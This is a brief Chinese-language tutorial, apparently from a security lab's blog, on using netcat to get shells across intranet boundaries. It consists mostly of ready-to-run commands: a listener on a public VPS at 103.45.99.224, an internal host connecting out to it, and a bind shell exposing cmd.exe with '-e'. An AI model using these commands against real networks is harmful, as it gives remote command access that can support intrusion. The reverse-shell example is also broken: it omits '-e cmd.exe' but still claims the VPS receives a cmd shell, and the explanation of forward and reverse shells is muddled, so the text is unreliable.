Nc内网端口转发---字节脉搏实验室

工具介绍

Netcat工具可在github下载，瑞士军刀，没啥好说的老牌工具了（杀软杀的厉害）

反向连接

场景概述：

A主机外网 无法访问B内网机器

B内网机器 可以访问A外网机器

A:103.45.99.224(公网vps)

B: 10.211.55.4(内网机器)

A:公网vps执行：

Nc.exe -lvvp 8787

B:内网执行

Nc.exe 103.45.99.224 8787

此时A主机公网vps就会收到B内网主机的cmd

正向连接

场景概述：

A内网 可以访问 外网B

B外网 不能访问 内网A

在外网B主机上执行nc -l -p 5555 -e cmd.exe

随后在内网A上执行nc –nvv 103.45.99.224 5555

注：如果客户端【相当于内网】连接服务器【相当于外网】，想获取服务器的shell，那么称为正向shell，如果是客户端连接服务器，服务器端想获取客户端的shell，那么称为反向shell，另外有关于nc在linux上的操作是一样的，更换几个命令即可